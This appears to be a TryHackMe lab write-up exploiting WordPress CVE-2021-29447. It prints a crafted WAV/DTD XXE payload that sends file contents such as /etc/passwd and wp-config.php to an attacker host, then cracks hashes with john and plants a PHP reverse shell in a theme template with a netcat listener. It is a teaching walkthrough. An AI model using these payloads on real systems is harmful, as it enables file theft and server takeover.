THM - Wordpress: CVE-2021-29447
THM - Wordpress: CVE-2021-29447
Hi everyone,
today we see Wordpress: CVE-2021-29447 on TryHackMe
An XXE vulnerability consists of an injection that takes advantage of the poor configuration of the XML interpreter. This allows us to include external entities, enabling us attack to applications that interpret XML language in their parameters. We'll explore a recent XXE vulnerability, albeit one that comes with some situational caveats.
Researchers at security firm SonarSource discovered an XML external entity injection (XXE) security flaw in the WordPress Media Library. The vulnerability can be exploited only when this CMS runs in PHP 8 and the attacking user has permissions to upload media files. Take note of the latter condition as we walk through an example of exploiting this vulnerability below.
Impact
- Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
- Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
CVE descriptions from cve-mitre.org:
Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
We start
Googling a bit and reading the "introduction" section of the room we know that we will need 2 files:
- a wav file to uplod in wordpress.
- a dtd file that will trigger a response to our terminal.
Let's get them ready:
Wav file:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.11.16.30:4444/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > evilsound.wav
Dtd file:
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.11.16.30:4444/?p=%file;'>" >
At the end of the first line you have inserted "resource=/etc/passwd" this to verify that everything works.
Once verified to proceed in the room we will change it to answer the second question: Based on the results of #1, what is the name of the database for WordPress?
ok, let's go, let's access to wordpress with the credentials provided in the introduction:
user: test-corp
password: test
then we proceed to uplod the wav file and start the web server via PHP with the command:
php -S 0.0.0.0:4444
As soon as we upload the wav file to our terminal we get a response with something similar:
Now we follow the suggestion of the introduction section to decode the answer:
So let's create a php file where we will insert this:
<?php echo zlib_decode(base64_decode('base64here')); ?>
and the server response like this:
ok it works! we read the /etc/passwd file.
Now to answer the questions of the room, we will change in the file evil.dtd /etc/passwd with /var/www/html/wp-config.php
this is because:
the server is running on ubuntu, and we need to read the wordpress settings file to answer questions 3 and 4.
Let's try:
Well, let's move on to the next questions:
they ask us which dbms wp uses, its version the port it uses.
to answer this let's connect to the DB with the credentials found in the wp-config file:
great! let's move on to the next questions!
we use john and rockyou.txt to get the password:
john --format:phpass hashWP --wordlist:/usr/share/wordlists/rockyou.txt</samp
ok, now we have obtained the passwor of another wordpress user presumably with administrator privileges, let's try to enter with the new credentials:
We're in!
We only have the answer to the last question left:
Compromise the machine and locate flag.txt
Then reverse shell and access the server.
We create a RS PHP PentestMonkey using the site reverse.7sec.pw
Now we go to apparance --> theme editor, change theme and select twenty nineteen, select 404 template page.
We delete everything we find we paste the reverse shell and save.
Save, from terminal run rlwrap through the command:
rlwrap -cAr nc -lvnp 4445
and we open the wordpress page:
http://10.10.233.178/wp-content/themes/twentynineteen/404.php
let's search and see the flag!
thanks, TryHackMe!